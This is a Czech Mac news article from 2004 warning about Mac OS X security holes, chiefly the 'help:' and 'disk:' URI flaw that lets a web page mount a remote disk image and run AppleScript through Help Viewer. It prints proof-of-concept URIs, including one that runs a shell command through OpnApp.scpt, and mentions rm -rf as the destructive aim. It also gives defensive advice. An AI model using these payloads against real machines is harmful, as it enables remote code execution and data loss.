Tak tohle není v pořádku! - MujMAC.cz - Apple, Mac OS X, Apple iPod

Navigace:  » Úvodní stránka  » Rubriky  » Zprávy o Applu  

21. května 2004, 00.00 | Před nedávnem jsme vás informovali o potenciálních bezpečnostních dírách v Mac OS X. Bohužel se situace v této oblasti poněkud zhoršila a byla objevena chyba, která je celkem zásadní - může ohrozit váš počítač při surfování internetem. Dnes vám tuto hrozbu popíšeme a poradíme, jak se bránit.

Před nedávnem jsme vás informovali o potenciálních bezpečnostních dírách v Mac OS X. Šlo o možné spuštění nebezpečné aplikace schovávající se za ikonku hudebního souboru (MP3). To bylo způsobené konfliktem metod na určování typu souboru (koncovka a type/creator) - tento trojský kůň, i když to je nadnesené označení, dostal název Virus.mp3, ale jednalo se pouze o demonstraci problému, nikoliv o skutečné nebezpečí.

O měsíc později se objevila poněkud destruktivnější varianta - AS.MW2004.Trojan - Applescriptová aplikace (108 KB) tvářící se jako instalátor kancelářského balíku MS Office 2004, po jejímž spuštění dojde ke smazání domovské složky. Tento "trojský kůň" se šířil pouze na Gnutella P2P síti. Opět se nejedná o trojského koně v pravém slova smyslu - nedochází k šíření, jde "pouze" o program, který spustí příkaz v shellu. Problém je, že má ikonku instalátoru MS Office, a tak může uživatele zmást. Na druhou stranu očekávat, že na P2P síti najdu oficiální instalaci MS Office 2004 o velikosti 108 KB, je trestuhodné a zjevně se to pár uživatelům nevyplatilo. Vytvořit takový applescript je otázkou minuty, těžší je donutit uživatele, aby si jej sám spustil, ale i to se tvůrci podařilo. Obávám se, že proti takovému útoku nebude obrana nikdy - uživatel sám nese odpovědnost za aplikace, které aktivuje a jestliže si sám spustí program, který je nebezpečný, tak jej žádný antivir ani firewall neochrání.

Nebezpečí na obzoru
Bohužel netrvalo dlouho a objevila se další bezpečnostní záležitost. Tentokrát se ale jedná o skutečnou hrozbu. Může totiž dojít k aktivaci nebezpečného kódu i bez přičinění uživatele, resp. stačí v prohlížeči otevřít pouhou webovou stránku, jejíž tvůrce má s obsahem vašeho disku trochu jiné úmysly než vy.

Celý problém se týká dvou URI (Unique resource identifier) manipulátorů 'help' a 'disk'. Tyto identifikátory v adrese určují o jakou službu jde, resp. jak má být požadavek zpracován (např. file, http, ftp, news, mailto, gopher). První z nich - 'help' dovoluje spustit program Help Viewer - zkuste zadat do Address Baru v Safari "help:" a uvidíte, co se stane. To by ještě takový problém nebyl, kdyby program Help Viewer neuměl spouštět applescript soubory. Jak může být applescript silná zbraň si už asi dokážete představit. Druhý manipulátor - 'disk' naopak umí zpřístupnit (mount) obraz .dmg disku, a to i přes síť. A kombinace těchto dvou identifikátorů je velmi (opravdu velmi!) nebezpečná.

Ale buďme konkrétní. Zkuste do prohlížeče zadat:

help:runscript=../../Scripts/Info Scripts/Current Date & Time.scpt

Dojde ke spuštění aplikace Help Viewer, která aktivuje applescript uvedený v odkazu. V tomto případě nemusíte mít strach, nejedná se o destruktivní kód. Teď si představte, že Help Viewer spustí applescript, který bude mít v úmyslu vám smazat domovskou složku, místo aby vás informoval o aktuálním čase. Máte pravdu, aby se mu to podařilo, tak by musel znát k takovému skriptu cestu. A zde se dostáváme k druhé části problému.

Jak k uživateli dostat nebezpečný kód?
Uživatel používající Safari se dostane na nebezpečnou webovou stránku, kde dojde k samovolnému stahování obrazu disku (dmg) obsahujícího nebezpečný kód, a v předvolbách prohlížeče (Safari) má standardně povoleno "Open safe files after downloading". Po stažení dmg souboru se Safari domnívá, že se jedná o bezpečný soubor, a tak disk zpřístupní.

Druhou (a také jednodušší) variantou je zpřístupnit obraz disku, který je uložený na síti (resp. internetu) pomocí manipulátoru 'disk'. Adresa v html stránce může vypadat třeba:

disk://doména.cz/Jméno_disku.dmg

a po načtení se disk připojí. A útočník má vyhráno, protože má vše, co potřebuje - zná cestu ke svému skriptu a ta je:

/Volumes/Jméno_disku/Jméno_nebezpečného_skriptu

Teď stačí, aby se stránka obnovila a spustila nebezpečný kód pomocí aplikace Help Viewer (k tomu doje díky manipulátoru 'help:', který Help Viewer standardně otevře). Nyní už nezbývá než čekat, co si na vás tvůrce připravil.

Na internetu se objevila další ukázka toho, co vše může aplikace Help Viewer pomocí identifikátoru 'help' "způsobit" - spustit příkazy přímo v shellu. A to díky skriptu OpnApp.scpt, který je součástí balíčku Helpu. Aby skript fungoval, nesmí být Help VIewer zapnutý - je potřeba jej mezi jednotlivými pokusy ukončit.

help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt string=usr:bin:top

Po zadání této adresy do prohlížeče se vám v Terminálu pustí příkaz top. Tímto způsobem, nelze (alespoň zatím) zadávat příkazy s mezerou, takže 'rm -rf', který by vás připravil o data během pár sekund, zatím nefunguje. Naštěstí.

Jak se bránit?
Existuje řešení, i když ne zatím v podobě záplaty od společnosti Apple. Pokud máte strach, že při surfování internetem narazíte na takto škodlivou stránku, je potřeba změnit přiřazení protokolu 'help', aby nedošlo ke spuštění aplikace Help Viewer. V tom vám pomůže třeba ovládací panel jménem More Internet. Po instalaci se vám ukáže v System Preferences a v něm stačí změnit nastavení manipulátoru 'help' třeba na hru Chess či TextEdit - rozhodnutí je na vás. A pokud se vám při práci s internetem spustí samovolně šachy (nebo aplikace, kterou jste si nastavili), máte jistotu, že jste se právě vyhnuli problémům.

Tato záležitost je označována jako "extremely critical" a není se proč divit - zaplatit smazáním domovské složky za návštěvu webové stránky je opravdu velká a bolestivá daň. Podle zpráv na internetu bere Apple tento problém vážně a vyšetřuje jej. Doufejme, že řešení najde dříve, než se začnou objevovat stránky s takto nebezpečným obsahem.